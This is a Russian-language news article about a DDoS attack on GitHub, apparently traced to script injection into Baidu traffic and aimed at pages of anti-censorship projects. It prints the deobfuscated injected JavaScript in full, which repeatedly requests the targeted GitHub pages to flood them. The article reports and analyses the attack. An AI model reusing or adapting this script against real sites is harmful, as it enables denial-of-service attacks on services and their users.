Github вторые сутки держится против DDoS-атаки

Github более 24 часов ^[1] выдерживает непрерывную DDoS-атаку. О текущем состоянии периодически сообщают в твиттере @GithubStatus ^[2] и на странице https://status.github.com/ ^[3].

Сервис уже недоступен для части пользователей. Последнее сообщение в твиттере два часа назад ^[4].

Судя по всему, атака имеет китайское происхождение. Есть свидетельства ^[5], что некоторым посетителям крупнейшей в Китае поисковой системы Baidu в HTTP-пакеты внедряют посторонний скрипт, который каждые две секунды запрашивает с Github страницы github.com/greatfire/ ^[6] и github.com/cn-nytimes/ ^[7].

Вредоносный скрипт — hm.baidu.com/h.js ^[8]. Он должен быть пустым, но после HTTP-инъекции получает такое содержимое.

Github вторые сутки держится против DDoS-атаки - 1

Листинг после деобфускации

document.write("<script src="http://libs.baidu.com/jquery/2.0.0/jquery.min.js">// <![CDATA[
x3c/script>");
!window.jQuery && document.write("<script src='http://code.jquery.com/jquery-latest.js'>x3c/script>");
startime = (new Date).getTime();
var count = 0;
 
function unixtime() {
    var a = new Date;
    return Date.UTC(a.getFullYear(), a.getMonth(), a.getDay(), a.getHours(), a.getMinutes(), a.getSeconds()) / 1E3
}
url_array = ["https://github.com/greatfire/", "https://github.com/cn-nytimes/"];
NUM = url_array.length;
 
function r_send2() {
    var a = unixtime() % NUM;
    get(url_array[a])
}
 
function get(a) {
    var b;
    $.ajax({
        url: a,
        dataType: "script",
        timeout: 1E4,
        cache: !0,
        beforeSend: function() {
            requestTime = (new Date).getTime()
        },
        complete: function() {
            responseTime = (new Date).getTime();
            b = Math.floor(responseTime - requestTime);
            3E5 > responseTime - startime && (r_send(b), count += 1)
        }
    })
}
 
function r_send(a) {
    setTimeout("r_send2()", a)
}
setTimeout("r_send2()", 2E3);

Если это действительно так, то DDoS-атака может иметь политический характер и, возможно, ведётся при участии государственных органов с помощью глубокой инспекции трафика. Возможно, власти пытаются затруднить доступ к программным инструментам по вышеуказанным адресам. Это VPN и другие программы для обхода китайской цензуры.

В результате DDoS-атаки страдают и все остальные пользователи Github.

Кстати, администраторы проекта GreatFire ещё неделю назад сообщали ^[9] о начавшейся DDoS-атаке мощностью примерно 2,6 млрд запросов в час (примерно в 2500 раз выше обычного уровня). Активистам приходится платить $30 000 в день за трафик компании Amazon.

Автор: alizar

Источник ^[10]

Сайт-источник PVSM.RU: https://www.pvsm.ru

Путь до страницы источника: https://www.pvsm.ru/informatsionnaya-bezopasnost/87188

Ссылки в тексте:

[1] более 24 часов: https://status.github.com/messages

[2] @GithubStatus: https://twitter.com/githubstatus/

[3] https://status.github.com/: https://status.github.com/

[4] два часа назад: https://twitter.com/githubstatus/status/581483116403027968

[5] свидетельства: http://insight-labs.org/?p=1682

[6] github.com/greatfire/: https://github.com/greatfire/

[7] github.com/cn-nytimes/: https://github.com/cn-nytimes/

[8] hm.baidu.com/h.js: http://hm.baidu.com/h.js

[9] сообщали: https://zh.greatfire.org/blog/2015/mar/we-are-under-attack

[10] Источник: http://geektimes.ru/post/247978/

Нажмите здесь для печати.